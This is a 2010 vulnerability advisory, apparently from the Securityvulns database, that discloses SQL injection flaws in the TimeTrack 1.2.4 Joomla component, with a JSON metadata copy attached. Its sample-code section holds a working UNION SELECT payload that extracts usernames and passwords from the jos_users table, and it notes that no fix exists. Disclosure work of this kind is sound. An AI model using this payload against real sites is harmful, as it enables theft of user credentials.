TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities

2010-09-23T00:00:00

Description

TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities Name TimeTrack Vendor http://www.itrn.de Versions Affected 1.2.4 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-09-22 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ TimeTrack is a time tracking Component for Joomla! 1.5 to collect, categorize and evaluate working hours and services. Monthly Reports can generated and exported as PDF or CSV-File. II. DESCRIPTION _______________ Many numeric parameters are not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. III. ANALYSIS _____________ Summary: A) Multiple SQL Injection A) Multiple SQL Injection _________________________ Each module is vulnerable to SQL Injection because all numeric fields are not sanitised. IV. SAMPLE CODE _______________ A) Multiple SQL Injection http://host/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users V. FIX ______ No fix.

{"id": "SECURITYVULNS:DOC:24788", "bulletinFamily": "software", "title": "TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities", "description": "TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities\r\n\r\n Name TimeTrack\r\n Vendor http://www.itrn.de\r\n Versions Affected 1.2.4\r\n\r\n Author Salvatore Fresta aka Drosophila\r\n Website http://www.salvatorefresta.net\r\n Contact salvatorefresta [at] gmail [dot] com\r\n Date 2010-09-22\r\n\r\nX. INDEX\r\n\r\n I. ABOUT THE APPLICATION\r\n II. DESCRIPTION\r\n III. ANALYSIS\r\n IV. SAMPLE CODE\r\n V. FIX\r\n \r\n\r\nI. ABOUT THE APPLICATION\r\n________________________\r\n\r\nTimeTrack is a time tracking Component for Joomla! 1.5\r\nto collect, categorize and evaluate working hours and\r\nservices. Monthly Reports can generated and exported as\r\nPDF or CSV-File.\r\n\r\n\r\nII. DESCRIPTION\r\n_______________\r\n\r\nMany numeric parameters are not properly sanitised before\r\nbeing used in a SQL query. This can be exploited to\r\nmanipulate SQL queries by injecting arbitrary SQL code.\r\n\r\n\r\nIII. ANALYSIS\r\n_____________\r\n\r\nSummary:\r\n\r\n A) Multiple SQL Injection\r\n \r\n\r\nA) Multiple SQL Injection\r\n_________________________\r\n\r\nEach module is vulnerable to SQL Injection because all\r\nnumeric fields are not sanitised.\r\n\r\n\r\nIV. SAMPLE CODE\r\n_______________\r\n\r\nA) Multiple SQL Injection\r\n\r\nhttp://host/path/components/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users\r\n\r\n\r\nV. FIX\r\n______\r\n\r\nNo fix.\r\n", "published": "2010-09-23T00:00:00", "modified": "2010-09-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24788", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:36", "edition": 1, "viewCount": 14, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11161"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11161"]}]}, "exploitation": null, "vulnersScore": 1.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645427878, "score": 1659803227}, "_internal": {"score_hash": "6f42ea270260696c9e03c97b8ecf4e5f"}}